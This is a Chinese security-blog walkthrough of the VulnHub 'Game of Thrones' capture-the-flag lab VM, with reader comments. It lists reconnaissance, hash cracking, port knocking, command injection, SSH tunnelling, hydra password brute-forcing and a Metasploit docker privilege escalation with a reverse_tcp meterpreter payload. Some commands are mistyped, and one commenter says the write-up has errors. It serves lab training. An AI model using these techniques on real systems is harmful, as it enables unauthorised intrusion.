thrones
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
Game-of-Thrones-CTF-1.0靶机实战演练 小鸟2018-06-23现金奖励共242795人围观 ,发现 35 个不明物体 WEB安全
0×01 前言
这个靶机的主题是“权利的游戏”,难度在中高水平,目标是获得七国的flag和四个额外的flag,其中包括三个secret flag和一个final flag,需要一点《权力的游戏》的知识,完全没看过也没有关系,但是作为一名黑客,这种史诗电视剧还是推荐你去看一下。在夺旗过程中你需要反复看地图,地图会给你很多信息,还要仔细看每个提示。
image.png
0×02 环境配置
靶机下载地址:https://www.vulnhub.com/entry/game-of-thrones-ctf-1,201/我用的是VMware,虚拟机NAT方式连接,靶机自动获取IP本次实战:靶机IP:192.168.128.137本机IP:192.168.128.106
0×03 实战演练
namp开路,IP发现:image.png找到靶机IP,继续端口服务探测:
image.png 发现80端口运行web服务,所以我们在浏览器中打开,权利的游戏主题曲会循环播放,边听歌边挖flagimage.png 接下来查看页面源代码,这是挖web漏洞的套路 image.png 是一些介绍靶机的信息,包括目标,注意事项和小提示接下来用dirb扫描web目录image.png 有robots.txt文件,打开以后发现里面有几个目录 image.png 打开:http://192.168.128.137/secret-island/ ,是一张小指头的图片,并且发现了地图链接image.png 打开地图后可以找到所有flag的位置,并且还能看到对应的服务,这是重要信息,后面的探测都要依据这样地图image.png打开名为/ direct-access-to-kings-landing /的目录image.pngimage.png是一张乔弗里的照片,没有发现敏感信息 根据robots.txt文件提示,打开 http://192.168.128.137/the-tree/ ,并且挂上代理在burp中抓包,将User-Agent: Three-eyed-raven添加到请求头中,发送数据包image.pngimage.pngimage.png只是雪诺挂掉的的照片,还是没什么有用的信息啊之前dirb扫目录发现了一个诡异的目录/ h / i / d / d / e / n / ,打开看看image.png看看源代码发现了一个密码:A_verySmallManCanCastAVeryLargeShad0w 根据提示这个地方时dorne,因为dorne的领主是:oberynmartell,那估计这个就是登录口令再看看地图,发现dorne对应的是ftp image.png 使用ftp连接我们找到的用户名和密码image.png 发现了两个文件,通过ftp下载下来,打开其中一个,下面是一个哈希散列加密密码,需要破解 image.png 使用john the ripper解密这个文件,找到密码(这个a.txt就是上面的hash.txt)
John --format = dynamic_2008 a.txt
image.png 使用mcrypt来解密我们在ftp服务器中找到的加密文件
mcrypt -d the_wall.txt.nc
image.pngimage.png文件都被解密了,留着后面用我们现在将在文件中找到的域:winterfell.7kingdoms.ctf 添加到/ etc / hosts并打开链接 image.png 我们使用上面找到的用户名和密码登录,看到一个包含了两个图像的页面,是雪诺和北境旗标 image.png查看源代码,找到了第一个flag:You conquered the Kingdom of the North. This is your second kingdom flag!639bae9ac6b3e1a84cebb7b403297b79 image.png将北境旗标下载下来,用文本方式打开后在结尾发现了这句话:Timef0rconqu3rs TeXT should be asked to enter into the Iron Islands fortress” – Theon Greyjoyimage.pngimage.png它暗示我们TXT记录中包含了一些敏感信息,所以我用nslookup来检查TXT记录,我们必须对域名进行一些更改才能使其有效,并找到了 第二个flag
命令:nslookup -q = txt Timef0rconqu3rs.7Kingdoms.ctf 192.168.128.137
text = “You conquered Iron Islands kingdom flag: 5e93de3efa544e85dcd6311732d28f95
image.png
现在我们将新域名添加到/etc/hosts并打开上面TXT记录中找到的链接
http://stormlands.7kingdoms.ctf:10000
image.png
我们使用在TXT记录中找到的用户名和密码登录
Enter using this user/pass combination: aryastark/N3ddl3_1s_a_g00d_sword#!
image.png
随便看看网站有没有问题
image.png
使用文件管理器模块,打开一个文件管理器,访问看看里面的文件
浏览器要执行Java模块才能打开文件管理器,这个我也卡了好久,我是用IE解决的
image.png
在/ home / aryastark文件夹中,找到了一个名为flag.txt的文件
image.png
下载文件在主机中打开它,找到了第三个flag:
This is your flag: 8fc42c6ddf9966db3b09e84365034357
image.png
nmap扫描的时候就知道靶机正在运行postgresql,现在这个提示是要我们访问数据库,使用上面找到的文件中提供的用户名密码连接
psql -h 192.168.128.137 --u robinarryn -d mountainandthevale
image.png
找到一个名为flag的表,打开它找到了一个base64编码的字符串
image.png
我们解码base64编码字符串找到了我们的第四个flag:
This is your flag: bb3aec0fdcdbc2974890f805c585d432
image.png
检查其他表格以防过任何有用的信息,在其中一个表格中,我们找到了几个名字
select * from aryas_kill_list;
在arya_kill_list中,发现这些名字似乎会用得到
image.png
在数据库中搜索,我们找到一个rot16编码的字符串。
select * from braavos_book;
image.png
1 | City of Braavos is a very particular place. It is not so far from here.
2 | “There is only one god, and his name is Death. And there is only one thing we say to Death: Not today” – Syrio Forel
3 | Braavos have a lot of curious buildings. The Iron Bank of Braavos, The House of Black and White, The Titan of Braavos, etc.
4 | “A man teaches a girl. -Valar Dohaeris- All men must serve. Faceless Men most of all” – Jaqen H’ghar
6 | “A girl has no name” – Arya Stark
7 | City of Braavos is ruled by the Sealord, an elected position.
8 | “That man’s life was not yours to take. A girl stole from the Many-Faced God. Now a debt is owed” – Jaqen H’ghar
9 | Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo. Ro gkxdc iye dy snoxdspi kc yxo yp iyeb usvv vscd. Covomd sd lkcon yx drsc lyyu’c vycd zkqo xewlob. Dro nkdklkco dy myxxomd gsvv lo lbkkfyc kxn iyeb zkccgybn gsvv lo: FkvkbWybqrevsc
现在转换这个rot16编码,找到了数据库的名称和密码,同时也给了我们一个提示,要使用我们在上表中找到的用户名。
http://www.rot13.com/
image.png
The many-faced god wants you to change your face. He wants you to identify as one of your kill list. Select it based on this book's lost page number. The database to connect will be braavos and your password will be: ValarMorghulis
枚举用户名后,我们发现TheRedWomanMelisandre是用户名
image.png登陆后查看里面的数据,检查temple找到了第五个flag:
3f82c41a70a8b0cfec9052252d9fd721
image.png看过地图后发现,我们到达的王国是在地图上显示的imap服务中,但是没有开启这个端口,现在我们使用之前找到的数字knock,试图让靶机打开143端口
knock 192.168.128.137 3487 64535 12345
image.png
由于我的kali怎么都敲不开,我不得不换一台kali虚拟机,终于敲开了
现在我们用nmap扫描来检查服务器上是否有新的端口打开,我们发现正在运行imap的端口143打开了
nmap -p- 192.168.128.137
image.png
使用netcat连接它,我们使用前面找到的用户名和密码。
NC 192.168.128.137 143
image.png
在收件箱中,我们找到了我们的第 六个flag,我们也得到了使用端口1337的提示,并给出了登录用户名和密码
image.png
我们登录到网站,发现它是git网站。
TywinLannister LannisterN3verDie!
image.png通过漏洞扫描后,我发现这个网站有命令注入漏洞
image.png
标题下的编码信息是十六进制的,解码:/home/tyrionlannister/checkpoint.txt
经过一些命令注入,找到了如下信息
image.png
第七个flag: c8d46d341bea4fd5bff866a65ff8aea9 ,以及SSH的用户名和密码:
用户: daenerystargaryen
密码: .Dracarys4thewin。
ssh登录:(xshell)
image.png
通过查找,我发现了两个名为digger.txt和checkpoint.txt的文件,checkpoint.txt包含一个提示:通过ip 172.25.0.2的ssh登录,并使用文件digger.txt中的字典
image.png
我们通过ssh将digger.txt下载到我们的系统中。
scp digger.txt root@192.168.1.116:
image.png
我们使用本地隧道将其绑定到我们的2222端口。
ssh daenerystargaryen@192.168.128.137 -L 2222:172.25.0.2:22 -N
image.png
现在我使用hydra通过ssh登录,使用root作为用户名,并使用digger.txt文件来爆破密码
发现了用root的密码“Dr4g0nGl4ss!”
image.png
我们使用这个口令来通过ssh登录,我们使用localhost进行连接,因为我们已经完成了ssh本地隧道的绑定
image.png
查看文件发现了一个secret flag,我们还得到了一个用户名和密码来通过ssh登录
Host’s ssh:
branstark/Th3_Thr33_Ey3d_Raven
This is your flag: a8db1d82db78ed452ba0882fb9554fc9
image.png
我们使用metasploit通过ssh使用这个用户名和密码来进行连接
msf>use auxiliary/scanner/ ssh / ssh_login
msf auxiliary(scanner / ssh / ssh_login)> set rhosts 192.168.128.137
msf auxiliary(scanner / ssh / ssh_login)>set username branstark
msf auxiliary(scanner / ssh / ssh_login)>set password Th3_Thr33_Ey3d_Raven
msf auxiliary(scanner / ssh / ssh_login)>run
image.png
在搜索了一些版本信息和提权脚本后,我注意到这个服务器是基于docker的,所以我在metasploit中使用docker提权脚本
msf>使用exploit / linux / local / docker_daemon_privilege_escalation
msf exploit(linux / local / docker_daemon_privilege_escalation)> set lhost 192.168.128.137
msf exploit(linux / local / docker_daemon_privilege_escalation)> set payload linux / x86 / meterpreter / reverse_tcp
msf exploit(linux / local / docker_daemon_privilege_escalation)> set session 1
msf exploit(linux / local / docker_daemon_privilege_escalation)>run
image.png
现在我拿到了提权后的会话,现在检查发现自己是root权限
image.png
查看文件,找到一个名为final_battle的密码保护zip文件和一个告诉我们如何找到密码的文件,它包含一些伪代码,告诉我们如何使用我们找到的secret flag来找到密码
image.png
image.png
通过伪代码,找到了另一个flag:3f82c41a70a8b0cfec9052252d9fd721
现在我已经获得了2个secret flag,通过文件搜索我发现音乐文件中有一个secret flag,我找到了2个音乐文件,使用exiftool发现了mp3文件包含的secret flag
exiftool game_of_thrones.mp3
image.png
找到三个secrect flag:
8bf8854bebe108183caeb845c7676ae4
3f82c41a70a8b0cfec9052252d9fd721
a8db1d82db78ed452ba0882fb9554fc9
将伪代码写成python代码:
image.png
我们运行程序,找到了密码
image.png
Password:45c7676ae4252d9fd7212fb9554fc9
我们使用zip来提取文件并使用找到的密码
7z e final_battle
我们发现一个名为flag.txt的文件被提取,我们打开文件并找到我们的final flag
8e63dcd86ef9574181a9b6184ed3dde5
image.png
我发现了一个名为flag.txt的文件,打开文件找到我们的final flag
8e63dcd86ef9574181a9b6184ed3dde5
image.png
所有flag都已找到:
image.png
congratulations you pwned the seven kingdoms game of thrones ctf AWESOME
参考文章:
https://www.vulnhub.com/entry/game-of-thrones-ctf-1,201/
http://www.hackingarticles.in/hack-game-thrones-vm-ctf-challenge/
http://devloop.users.sourceforge.net/index.php?article136/solution-du-ctf-game-of-thrones-1-de-vulnhub
* 本文作者:小鸟,转载请注明来自FreeBuf.COM
小鸟
小鸟
2 篇文章
等级: 3级
||
上一篇:挖洞经验 | 看我如何发现Paypal内部信息泄露漏洞下一篇:挖洞经验 | 看我如何挖掘并成功利用印度Popular Sports公司网站主机头的SQL注入漏洞
发表评论已有 35 条评论
Hydraxx (1级) 2018-06-23回复 1楼
老铁啊 下载了 用vm打开不了 打开没任何报错 就是没反应 这是什么问题
亮了(0)
小鸟 (3级) 2018-06-23回复
@ Hydraxx 我用的是VMware12
亮了(0)
Hydraxx (1级) 2018-06-24回复
@ 小鸟 我的14 等了一段时间 还是不行 我先看看文章吧 谢谢
亮了(0)
小鸟 (3级) 2018-06-23回复
@ Hydraxx 可能是加载需要一点时间,参考这篇文章看看:https://bbs.ichunqiu.com/thread-39761-1-5.html
亮了(0)
testccc 2018-06-24回复 2楼
namp开路???
亮了(0)
小鸟 (3级) 2018-06-24回复
@ testccc 老哥太较真了 :shock:
亮了(0)
死宅10086 (7级) 2018-06-24回复 3楼
666
亮了(0)
SpongeB0B (1级) 2018-06-24回复 4楼
66666666
亮了(0)
Sean 2018-06-24回复 5楼
您用的是什么系统 怎么我每一步全都有问题?
亮了(0)
小鸟 (3级) 2018-06-25回复
@ Sean vmware12 NAT连接 攻击机kali 再试试?
亮了(0)
Sean 2018-06-24回复 6楼
萌新求指导 好多方面都有问题 还是按照您的操作来的
亮了(0)
小鸟 (3级) 2018-06-25回复
@ Sean 安装有问题 还是渗透有问题
亮了(0)
Sean 2018-06-25回复
@ 小鸟 John 的情况是 No Password hash load 然后是 mcrypt 解密说那个txt.nc不是常规文件得跳过
亮了(0)
小鸟 (3级) 2018-06-25回复
@ Sean 把两个文件get 下来 hash密文保存到文档然后john解密 估计是你文件下载出问题了
亮了(0)
Sean 2018-06-25回复
@ 小鸟 我就是这样弄的 拿到了hash密文之后保存到了hash.txt之后,用John is然后就是之前的问题
而且我所有的文档是ftp来get的
亮了(0)
小鸟 (3级) 2018-06-25回复
@ Sean 看看命令输的有没有问题 或者工具更新一下
亮了(0)
Sean 2018-06-25回复
@ 小鸟 kail是2018-02版本的 而且虚拟机Kail32 64位都尝试过还是一样的两个问题 命令的是按照您的检查了两遍的
亮了(0)
小鸟 (3级) 2018-06-25回复
@ Sean 这个靶机有点难 不适合新手 这步可以跳过 我之后会发一些简单的靶机 做那些入门比较合适
亮了(0)
sequel 2018-06-27回复
@ Sean hash中有$符号,echo写入的时候应该加转义符,echo 6000e084bf18c302eae4559d48cb520c\$2hY68a>a.txt
亮了(0)
wulang (1级) 2018-06-25回复 7楼
靶机的用户名密码是什么呢,老哥
亮了(2)
小鸟 (3级) 2018-06-25回复
@ wulang 拿到IP就可以搞了 不需要登录口令
亮了(0)
Echo遗忘城 2018-07-06回复
@ 小鸟 怎么拿IP,要登录的啊
亮了(0)
goodboylllh (1级) 2018-06-25回复 8楼
同样的问题。。在john破解密码那一步会出错
亮了(0)
小鸟 (3级) 2018-06-25回复
@ goodboylllh 搜一下 用其他命令破解试试
亮了(0)
sequel 2018-06-29回复 9楼
怎么通过/home/tyrionlannister/checkpoint.txt找到的第一个ssh密码?我试了半天都找不到
亮了(0)
wanye20698 (1级) 2018-07-07回复 10楼
第一个flag ftp登陆的时候,账户密码是什么,怎么验证了很多都不对!
亮了(2)
秋风瑟瑟朝夕不止 (1级) 2018-07-09回复 11楼
因为dorne的领主是:oberynmartell
这一步怎么想到的,怎么做的
亮了(0)
ksufer (1级) 2018-07-09回复
@ 秋风瑟瑟朝夕不止 the-tree那里确实是要提交user agent的,而不是文章里说的没有发现什么,而且提示在注释里很明显:
"You mUSt changE your own shape and foRm if you wAnt to GEt the right aNswer from the Three-eyed raven" – Written on the tree by somebody
把大写字母组起来看:USER AGENT
重新发送header然后就可以得到用户名了
亮了(3)
秋风瑟瑟朝夕不止 (1级) 2018-07-09回复 12楼
找了半天图片也没有啊
亮了(0)
ksufer (1级) 2018-07-09回复 13楼
https://www.colabug.com/2370006.html
亮了(1)
ksufer (1级) 2018-07-09回复
@ ksufer 应该是原文
亮了(0)
ksufer (1级) 2018-07-09回复
@ ksufer 而且文中存在诸多不合逻辑和错误的地方
亮了(0)
秋风瑟瑟朝夕不止 (1级) 2018-07-11回复 14楼
文件都被解密了,留着后面用我们现在将在文件中找到的域:winterfell.7kingdoms.ctf 添加到/ etc / hosts并打开链接
这一步是怎么写,求告知 ,具体步骤
亮了(1)
秋风瑟瑟朝夕不止 (1级) 2018-07-13回复 15楼
nslookup -q = txt Timef0rconqu3rs.7Kingdoms.ctf 192.168.1.133
这一步有问题,写不出来,求教
亮了(0)
ksufer (1级) 2018-07-19回复
@ 秋风瑟瑟朝夕不止 如果有需要可以加我微信ksufer888,我这里有完整的writeup
亮了(0)
昵称
请输入昵称
必须您当前尚未登录。登陆?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我
小鸟
小鸟
这家伙太懒,还未填写个人描述!
2
文章数
10
评论数
最近文章
Catch Me If You Can靶机实战演练
2018.06.28
Game-of-Thrones-CTF-1.0靶机实战演练
2018.06.23
浏览更多
相关阅读
安全宝-蓝莲花DEFCON CTF 资格赛2013纪实(一)RSA加密解密原理深度剖析(附CTF中RSA题型实战分析)10个问题帮您厘清什么是CTF2017年上海大学生信息安全竞赛复旦基因瓢虫战队Writeup天枢战队在国际HITB CTF全球总决赛中取得第2名佳绩
特别推荐
关注我们 分享每日精选文章
活动预告
11月
FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月
【16课时-连载中】挖掘CVE不是梦(系列课程2)
已结束
10月
【首节课仅需1元】挖掘CVE不是梦
已结束
9月
【已结束】自炼神兵之自动化批量刷SRC
已结束
FREEBUF免责声明协议条款关于我们加入我们广告及服务寻求报道广告合作联系我们友情链接关注我们
官方微信
新浪微博腾讯微博Twitter赞助商
Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
css.php0daybank
文章评论